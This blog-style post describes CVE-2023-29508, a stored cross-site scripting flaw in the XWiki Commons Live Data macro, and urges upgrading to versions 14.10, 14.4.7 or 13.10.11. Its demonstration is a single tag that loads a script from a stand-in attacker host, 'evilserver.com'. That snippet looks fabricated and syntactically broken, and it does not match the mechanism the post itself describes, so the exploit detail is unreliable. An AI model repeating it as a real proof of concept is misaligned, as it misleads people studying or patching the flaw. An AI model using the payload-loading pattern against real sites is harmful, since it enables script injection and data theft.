XWiki Commons, a collection of technical libraries, is a critical component of many top-level XWiki projects. These libraries not only support the overall structure and function of those projects, but also ensure their smooth and flawless operation. However, as with any software, vulnerabilities have the potential to arise, which can undermine the stability and security of these vital resources.

In this post, we'll be examining one such recent vulnerability - CVE-2023-29508 - which impacts the XWiki Commons software. We'll delve into the details of the vulnerability, provide a code snippet showcasing its exploit, and explore the patches released by XWiki to address this security flaw in versions 14.10, 14.4.7, and 13.10.11.

Vulnerability Description

CVE-2023-29508 is a stored Cross-Site Scripting (XSS) vulnerability that affects XWiki Commons's Live Data macro. This vulnerability enables a user lacking script rights to create a stored XSS attack if the last content author of the affected page does possess script rights.

To demonstrate this vulnerability, we'll use the following simple code snippet

<!-- The following code simulates a malicious user creating an XSS payload using the Live Data Macro. -->
<xwikilivetable sourcedata="http://evilserver.com/xss_payload.js"; ...>

In this example, a malicious user embeds an XSS payload (loaded from the "http://evilserver.com/xss_payload.js" URL) by utilizing the Live Data macro within the XWiki page. If the last author with script rights edited the page, the payload would be executed, resulting in a potential breach of sensitive information or other adverse consequences.

Original References

For further information about CVE-2023-29508, as well as the corresponding patches implemented by XWiki, please consult the following resources:

Official XWiki Security Advisory for CVE-2023-29508


National Vulnerability Database (NVD) - CVE-2023-29508


Patch Details and Recommendations

In order to address this vulnerability and ensure the security of the XWiki Commons platform, XWiki has released patches in the following versions: 14.10, 14.4.7, and 13.10.11. It is highly advised that all users currently deploying XWiki Commons update their software to one of these versions as soon as possible. Doing so will mitigate the risk associated with CVE-2023-29508, better safeguarding the overall security and stability of your XWiki projects.


In summary, CVE-2023-29508 is a stored XSS vulnerability affecting XWiki Commons's Live Data macro, which can result in potential security breaches if left unpatched. By acknowledging the nature of this vulnerability, understanding the code snippet, and referring to the original resources, users can gain valuable insight into the dangers of this exploit. Finally, by applying the available patches in versions 14.10, 14.4.7, and 13.10.11, users can protect their XWiki projects from harm and maintain system integrity.


Published on: 04/16/2023 08:15:00 UTC
Last modified on: 04/26/2023 13:12:00 UTC